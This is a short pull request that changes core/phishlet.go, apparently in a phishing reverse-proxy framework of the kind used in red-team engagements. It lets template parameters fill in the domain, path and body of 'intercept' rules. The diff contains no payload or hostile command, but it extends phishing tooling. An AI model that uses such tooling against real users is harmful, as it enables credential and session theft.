### PR TITLE
feature: add support for template parameters in intercept section (replace in domain and body)

### DIFF
--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -499,7 +499,7 @@ func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[stri
 			if ic.Path == nil {
 				return fmt.Errorf("intercept: missing `path` field")
 			}
-			path_re, err := regexp.Compile(*ic.Path)
+			path_re, err := regexp.Compile(p.paramVal(*ic.Path))
 			if err != nil {
 				return fmt.Errorf("intercept: `path` invalid regular expression: %v", err)
 			}

--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -512,7 +512,7 @@ func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[stri
 			if ic.Mime != nil {
 				mime = *ic.Mime
 			}
-			err = p.addIntercept(*ic.Domain, path_re, *ic.HttpStatus, body, mime)
+			err = p.addIntercept(p.paramVal(*ic.Domain), path_re, *ic.HttpStatus, p.paramVal(body), mime)
 			if err != nil {
 				return err
 			}


### PR DESCRIPTION
Hello,

This small PR enables template paramaters to be used within the `intercept` section (currently replacing in domain and body).

Have a good day,